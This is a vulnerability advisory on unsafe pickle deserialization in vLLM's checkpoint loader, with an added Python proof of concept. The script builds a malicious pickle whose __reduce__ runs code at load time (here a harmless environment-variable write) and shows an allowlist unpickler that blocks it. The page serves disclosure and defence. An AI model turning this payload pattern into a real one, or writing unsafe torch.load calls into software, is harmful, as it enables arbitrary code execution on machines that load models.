Safety vulnerability ID: 76350
The information on this page was manually curated by our Cybersecurity Intelligence Team.
vllm/model_executor/weight_utils.py implements hf_model_weights_iterator, which loads model checkpoints downloaded from Hugging Face. It calls torch.load with the weights_only parameter left at its default value of False. As the security warning at https://pytorch.org/docs/stable/generated/torch.load.html states, torch.load deserializes checkpoints with pickle, and unpickling a malicious file executes arbitrary code. A crafted checkpoint served from a Hugging Face repository can therefore run attacker-chosen code on the host that loads it with vLLM.
Latest version: 0.8.3
A high-throughput and memory-efficient inference and serving engine for LLMs
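The following script is an added illustration, not code from vLLM or from this advisory. It reproduces the mechanism with only the standard library: a pickle payload whose __reduce__ hands the unpickler a callable to run (here a benign eval that sets an environment variable, where a real payload would call os.system or subprocess), a plain pickle.loads that stands in for torch.load with weights_only=False, and a restricted unpickler whose find_class allowlist is the same technique torch applies when weights_only=True. The names MaliciousCheckpoint, ALLOWED_GLOBALS and VLLM_PICKLE_DEMO are the example's own; the benign checkpoint is a constructed OrderedDict standing in for a real state_dict.

```python
import io
import os
import pickle
from collections import OrderedDict

# Name of the environment variable the demo payload sets (chosen for this example).
MARKER = "VLLM_PICKLE_DEMO"


def build_benign_checkpoint() -> bytes:
    # Constructed stand-in for a real state_dict: parameter name -> values.
    state = OrderedDict([("layer.weight", [0.1, 0.2, 0.3]), ("layer.bias", [0.0])])
    return pickle.dumps(state)


class MaliciousCheckpoint:
    """Any class may define __reduce__; pickle stores the returned callable and
    arguments, and the unpickler calls them at load time. A real payload would
    use os.system or subprocess; this one only sets an environment variable so
    the code execution is observable without doing harm."""

    def __reduce__(self):
        code = f"__import__('os').environ.__setitem__({MARKER!r}, 'executed')"
        return (eval, (code,))


def build_malicious_checkpoint() -> bytes:
    return pickle.dumps(MaliciousCheckpoint())


def load_unsafe(data: bytes):
    # Same trust model as torch.load(path) with weights_only=False:
    # every global named in the stream is resolved and every REDUCE is executed.
    return pickle.loads(data)


# Allowlist of (module, name) pairs the loader may resolve. torch's weights_only
# unpickler follows the same pattern with tensor and storage types on its list.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode before any REDUCE runs,
        # so refusing here stops the payload before its callable is obtained.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name} while loading a checkpoint"
        )


def load_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def payload_executed() -> bool:
    return os.environ.get(MARKER) == "executed"


def restricted_load_rejects(data: bytes) -> bool:
    # True when the allowlisted loader refuses the stream without executing it.
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    benign = build_benign_checkpoint()
    evil = build_malicious_checkpoint()
    print("restricted loader accepts benign checkpoint:", load_restricted(benign)["layer.weight"])
    print("restricted loader rejects malicious checkpoint:", restricted_load_rejects(evil))
    print("payload ran before unsafe load:", payload_executed())
    load_unsafe(evil)
    print("payload ran after unsafe load:", payload_executed())
```

The restricted path fails closed: find_class raises on builtins.eval before the REDUCE opcode can call it, so the environment variable is never set, while the plain pickle.loads path runs the payload as a side effect of merely loading the file. Passing weights_only=True to torch.load gives the same protection for real checkpoints, and formats that carry no executable opcodes, such as safetensors, avoid the problem entirely.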